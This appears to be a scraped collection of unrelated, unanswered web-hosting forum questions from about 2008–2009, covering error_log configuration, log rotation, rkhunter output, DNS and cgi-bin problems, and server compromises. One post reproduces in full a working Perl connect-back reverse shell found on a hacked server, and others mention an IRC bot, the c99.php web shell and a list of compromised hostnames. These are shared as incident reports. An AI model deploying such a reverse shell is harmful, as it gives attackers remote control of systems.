When I was a customer at hostgator, whenever a terminating error within php was displayed it would log in the parent directory in a file called "error_log".
I want this to happen now on our dedicated server. I've looked at my local apache error log and it doesn't appear to show the same info as hostgator's setup showed.
Can anyone tell me how to set that up?
to found all of index.html files in my /home directory.
how can I found these files?
like this:
/home/a/public_html/index.html
/home/a/public_html/folder/index.html
/home/c/index.html
how to fix rkhunter from; 'not found' in local files and unknown for exim and php 5.2.5.
System checks
* Allround tests
Checking hostname... Found. Hostname is
Checking for passwordless user accounts... OK
Checking for differences in user accounts... OK. No changes.
Checking for differences in user groups... OK. No changes.
Checking boot.local/rc.local file...
- /etc/rc.local [ OK ]
- /etc/rc.d/rc.local [ OK ]
- /usr/local/etc/rc.local [ Not found ]
- /usr/local/etc/rc.d/rc.local [ Not found ]
- /etc/conf.d/local.start [ Not found ]
- /etc/init.d/boot.local [ Not found ]
* Application version scan
- Exim MTA 4.68 [ Unknown ]
- GnuPG 1.2.6 [ Old or patched version ]
- Apache [unknown] [ OK ]
- Bind DNS 9.2.4 [ OK ]
- OpenSSL 0.9.7a [ Old or patched version ]
- PHP 5.2.5 [ Unknown ]
- PHP 5.2.5 [ Unknown ]
- Procmail MTA 3.22 [ OK ]
- OpenSSH 3.9p1 [ OK ]
We used to be on a reseller acct (RedHat Enterprise, Apache 1.x, PHP4, cPanel 10) that would generate error_log files under the directory of the error(s). This was done without any special scripts under those directories or anything, it just did it.
Googling it, it appears that Apache did this by default but apparently it doesn't anymore.
With CentOS 5, Apache 2.2.x, PHP5 and cPanel 11 I can't figure out how to enable these error logs. I've Googled my brains out, been through the php.ini and httpd.conf and nada, nothing. The errors show up in the cPanel error logs but it's much easier and quicker when it generates the log file in the offending directory.
I rely heavily on these log files.
I've just had my server transfered and many files were missing. So, now I have a 100 Mb error_log file...
What should I do ?
If I rename it, I suppose the server will create a new one and it will be ok ?
How can I fix a size limit to the error_log files ?
I'm using Centos 5 + CPanel.
i have error show always in the apache error_log
[Fri Jan 18 07:17:06 2008] [notice] cannot use a full URL in a 401 ErrorDocument directive --- ignoring! ...
In /usr/local/apache/logs/error_log there are hundreds of these lines:
Quote:
mod_security: Filtering against POST payload requested but payload is not available [hostname "www.somedomain.com"]
This is a result of:
Code:
SecFilterScanPOST Off
Is there a way to exclude that line being logged in error_log file? If I turn it ON, those errors won't show up in error_log anymore, however, it'll break some scripts on my server. I prefer to leave it OFF.
The filesize is almost 200MB, how can I set log rotator to rotate them every 2 weeks?
I typed touch error_log in ssh but the filesize didn't change to 0
All accounst in my dedicated server start to show a very strange error_log with the following entries:
====
[04-Nov-2009 21:28:51] PHP Warning: PHP Startup: Unable to load dynamic library '/usr/local/lib/php/extensions/no-debug-non-zts-20060613/php_interbase.dll' - /usr/local/lib/php/extensions/no-debug-non-zts-20060613/php_interbase.dll: cannot open shared object file: No such file or directory in Unknown on line 0 .....
====
Always when a php script is accessed, new entrie with this error above is created.
I dont understand because php script have not any relation with intebase or pgsql and my server have not this e db installed.
I want to provide access to the last 50 entries of my error_log to my programmer. I do not want to provide him ssh access to my server for this.
I am on a Virtuozzo VPS with Plesk as my Control Panel.
Lately our VPS has needed to be restarted frequently (1-2x daily for the past 5 or so days).
I have pulled our eror_log file and pasted below the last several days. I am hoping someone can take a look at it and point me in the right direction.
Because of limitations, I cannot post anything with urls, but the two errors that have been occuring most frequently are below
Code:
[Mon Mar 3 07:37:22 2008] [error] (12)Cannot allocate memory: fork: Unable to fork new process
[Mon Mar 3 07:37:32 2008] [error] (12)Cannot allocate memory: fork: Unable to fork new process
[Mon Mar 3 07:37:42 2008] [error] (12)Cannot allocate memory: fork: Unable to fork new process
[Mon Mar 3 07:37:52 2008] [error] (12)Cannot allocate memory: fork: Unable to fork new process
[Mon Mar 3 07:38:02 2008] [error] (12)Cannot allocate memory: fork: Unable to fork new process
[Mon Mar 3 07:38:12 2008] [error] (12)Cannot allocate memory: fork: Unable to fork new process
[Wed Mar 5 07:44:02 2008] [error] Bad pid (15524) in scoreboard slot 44
[Wed Mar 5 07:44:02 2008] [error] Bad pid (3750) in scoreboard slot 46
[Wed Mar 5 07:44:02 2008] [error] Bad pid (3751) in scoreboard slot 47
My error logs say the following:
[Wed Jan 30 22:31:33 2008] [error] [client 150.101.99.206] File does not exist: /home/soupnazi/public_html/404.shtml
[Wed Jan 30 22:31:33 2008] [error] [client 150.101.99.206] File does not exist: /home/soupnazi/public_html/favicon.ico
[Wed Jan 30 22:29:36 2008] [error] [client 150.101.99.206] File does not exist: /home/soupnazi/public_html/404.shtml
[Wed Jan 30 22:29:36 2008] [error] [client 150.101.99.206] File does not exist: /home/soupnazi/public_html/favicon.ico
[Wed Jan 30 22:27:18 2008] [error] [client 150.101.99.206] File does not exist: /home/soupnazi/public_html/404.shtml
[Wed Jan 30 22:27:18 2008] [error] [client 150.101.99.206] File does not exist: /home/soupnazi/public_html/favicon.ico
[Wed Jan 30 22:26:48 2008] [error] [client 150.101.99.206] File does not exist: /home/soupnazi/public_html/404.shtml
[Wed Jan 30 22:26:48 2008] [error] [client 150.101.99.206] File does not exist: /home/soupnazi/public_html/favicon.ico
[Wed Jan 30 22:26:47 2008] [error] [client 150.101.99.206] File does not exist: /home/soupnazi/public_html/500.shtml
[Wed Jan 30 22:26:47 2008] [alert] [client 150.101.99.206] /home/soupnazi/public_html/Dolphin/.htaccess: Invalid command 'php_flag', perhaps misspelled or defined by a module not included in the server configuration
[Wed Jan 30 22:20:21 2008] [error] [client 150.101.99.206] File does not exist: /home/soupnazi/public_html/404.shtml
[Wed Jan 30 22:20:21 2008] [error] [client 150.101.99.206] File does not exist: /home/soupnazi/public_html/favicon.ico
[Wed Jan 30 22:20:19 2008] [error] [client 150.101.99.206] File does not exist: /home/soupnazi/public_html/500.shtml
Apache/1.3.41 (Unix) PHP/4.4.7 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.30 OpenSSL/0.9.7a
I need to delete that file its huge.
Is there a way to view the error_log starting from the bottom? My error_log is HUGE.
View 4 Replies View RelatedI couldn't keep my mouth shut (technically fingers). A customer wanted to upgrade servers and he needed a way to move the data across. Since I don't allow hard drives to be swapped, they have to do it manually all by themselves. I generally allow up-to 4 days for them to transfer data and make DNS changes, etc. But this time, I offered help! I agreed to move the data (darn me) and it just came out of me, involuntarily.
God knows what just happened... but in a positive way, customer is extremely happy!
So...
Both servers are on cPanel - with root access (duh)
200 odd files which total to 25 GB
1 database about 100 MB in size (no biggie)
I was planning on using one of my Windows 2003 servers (via remote desktop) to download the 25 GB and upload the 25 GB, but that sounds like a waste of resources and time.
Found a suspicious script running on a server in /dev/shm
Code:
#!/usr/bin/perl
use IO::Socket;
$system = '/bin/sh';
$ARGC=@ARGV;
print "Connect Back (S) 2007
";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port]
";
die "Ex: $0 127.0.0.1 2121
";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host
";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host
";
print "[*] Connecting... $ARGV[0]
";
print "[*] Spawning Shell
";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("unset HISTFILE; unset SAVEHIST ;echo;id;uname -a;w");
system($system);
#EOF
Removed it, changed all passwords, etc, anyone know how this might've gotten into /dev/shm? ( CentOS 4.4 )
We were tasked with helping a website owner find all the malscripts on his site and remove them. He, like many, learned that his site was delivering malicious code with an email from Google.
This website owner had tried removing the code himself and yet his site was still blacklisted by Google. This was killing his sales as anyone visiting with Firefox as their browser, or Chrome, were greeted with a big warning:
This site may harm your computer.
After about a week of trying to rectify the problem himself, he contacted us.
He provided us FTP access to his site so we could tackle it.
After downloading his site (which literally took 3 hours) we started scanning. We grep'd for the word "base64_decode" and found over 228 php files all with the following malscript (spaces added to protect the innocent):
Code:....
I have a valid ssl certificate for the website but it still shows address not found error. But sometimes it just works fine.
is it related to dns issue?
I do not know where to post this, I recently changed Hosts.
My domain through GoDaddy was changed to my new account that was setup, The issue is everyone else can see my website but me and I am not sure why?
On my end I get Server Not Found?
I can see my site through a Proxy and also I have shown the site to a few people and they have no issues accessing it...
For the first time after running a server for about a year I decided to buy a new server and in it I found out that there is a some sort of infection in it. What should I do next. The logs are attached in a n attachment.
Attached Files
rootkit.log.txt (9.4 KB, 70 views)
I cant visit my website! <snipped> everytime I go it says server not found. So I told some friends to go and they are able to see and visit <snipped> How is that possible?? They could and I cant? Yesterday same thing but then couple hours later it worked I could visit hmlegends.com but i didnt do anything and now today same thing server not found! i cleaned my history everything and still server not found!
So what I did is used a proxy <snipped> and then it worked!
But then I dont use a proxy SERVER NOT FOUND! Its like my IP cant reach hmlegends.com
I dont know how to solve this?!?? It just says server not found!
But it looks like everyone else could access it!
Anyways im using Firefox 2 but then maybe i thought it was my browser so switched to 3 so currently on firefox 3
and no its not its something with my IP cuz when i use proxy i could go to my site
but point is i dont wanna use proxy i wanna use my IP to go to hmlegends.com
Also im using Dial Up Internet!
I use AOL Dialer to connect!
Aol Dialer 4.8.8.4
I have recently brought a VPS hosting package. At the moment I am going through the tutoritals on the net that I have researched before getting a VPS package to give me some understanding on what I need to do to securior the server and also how to install the software that I require.
For most of today, I have been trying to sort out a problem that I am currently having.
Of which is I am trying to sort out a part of the tutorial from a website that requires the use of apt commands.
But for every command I am getting the message back apt..... Command not found. I am currently using the ubuntu operating system. And through some research, I have got the feeling that I might have the bare installation done on my server to just make it work.
Would I be right, and with the bare installation apt commands wouldn't be installed?
If I am, how would I go about installing the Apt commands and anything else that I might require?
I got a new BOX, i see 'cronjob' not working,
cronjob
-bash: cronjob: command not found
I installed
yum install vixie-cron.i386
Still
cronjob
-bash: cronjob: command not found
# cron
-bash: cron: command not found
how can i get 'cronjob' working?
I upgraded from Apache 1.3.7 to the latest copy
Everything works nicely, except the cgi-bin directory
When a user tries to access a script or even a standard text file, it throws up the error..
Not Found
The requested URL /cgi-bin/first.txt was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
When they try and access the cgi-bin directory itself, they get
Forbidden
You don't have permission to access /cgi-bin/ on this server
Now, I've checked the httpd.conf file and this is what it has for Cgi-bin
<IfModule alias_module>
ScriptAlias /cgi-bin/ "/usr/local/apache/cgi-bin/"
</IfModule>
<Directory "/usr/local/apache/cgi-bin">
AllowOverride None
Options None
Order allow,deny
Allow from all
</Directory>
And the error logs say..
[Sun Jan 20 18:09:56 2008] [error] [client xx.xx.xx.xx] File does not exist: /home/goewowc/public_html/404.shtml
[Sun Jan 20 18:09:56 2008] [error] [client xx.xx.xx.xx] script not found or unable to stat: /usr/local/apache/cgi-bin/first.txt
The CGI-bin directory is chmodded correctly, the files are also chmodded and belong to the correct group
while am installing some programs there is some problem in my php
PHP GD Module Not Found
how could i install it in SSH root?
After going back and forth with the folks that are supposed to be managing my server they finally checked and found an irc bot. Here is their message:
I have found a irc bot running on your server. The binaries are located at /var/lib/texmf/.dat/. You can see the tar file which the hacker uploaded at /var/lib/texmf/. I have changed the permissions to 000 so that you can verify the files.
The user of the files are nobody. Hence it is clear that the files were uploaded via url injection using some vulnerable script under some domain. Unfortunately there are no helpful logs to find the exact domains and the vulnerable script. It is certain that the files were first uploaded to /tmp and then moved from there. You can see some similar hack files at /tmp/.dat, /tmp/var and /tmp/.dev12. Also the permission of /var/lib/texmf/ was 777.
You should update all your web softwares to latest version so that they will include latest security patches. Also I will recommend you to enable mod_security in your server to prevent further hacks.
Let us know if you want this to be enabled.
Our Security Technician found yesterday a 200 user botnet on a hidden IRC server and was able to quickly email the compromised systems information (just hostname) to our abuse email. So today i spent the last 2 hours sending emails off to web hosting companies, educational institutions and corporate companies telling them that their systems have been compromised, we regulary email out systems we have found compromised. The thing that stuns me is that most of the systems we found compromised on IRC are dedicated lines between 10MBPS to 1GBPS... I found a few hosting companies and will list them so they can be found by them:
lvps212-241-192-85.vps.webfusion.co.uk
wp056.webpack.hosteurope.de
wp097.webpack.hosteurope.de
wp049.webpack.hosteurope.de
wp055.webpack.hosteurope.de
m2.wrango.com - Dedicated Server with NetworkSolutions
server1.hostfree.com.br
My server use cPanel 10x
CentOS
how to fix this problem?
php: /usr/lib/libmysqlclient.so.14: version `libmysqlclient_14' not found (required by php)
I just found a script on a customers account after some problems they were having, they mentioned injecting php code, that immediately threw up a red flag, when i took a look i found c99.php
I checked up and this seems to be the web equivalent of a rootkit.
Are there any legitimate reasons for this script? The customer is one of the strangest i've came accross because he had the lowest fraud score yet, used a Lady's name at signup/payment, yet calls himself Michael and seemed to do something with WHMcs security wise.. i dont want to post details as checks are still ongoing but it seems to be a problem with Language scripts and the customer was able to sign up on a monthly plan but Biannually... so no more invoices till 2009 ... strange, although wether innocently this was done or is a known security hole in WHMCS is not known yet.
after a day of crappy performance from one of my VPS accounts, I decided to start digging, and found eggdrop, and couple of other not so nice files in my /tmp directory.
I panicked, of course, and removed all traces of anything I could find that was bad, so I've unfortunately got no way to see how it happened, as far as I know (but I'm far from a security expert)
I need your help in shutting the system down to users. This is an HTTP/SSH/SMTP/POP3/IMAP server.
Tell me what you need to know and I will do my best to get it to you. Basically I'm just frustrated that I've been on it for 3 hours now.....wasting time because some SOB was bored....
How can I found the spammer on our server?
one of our customer trying to send mail with a PHP file! but I cannot found this account, can you help me to found this user?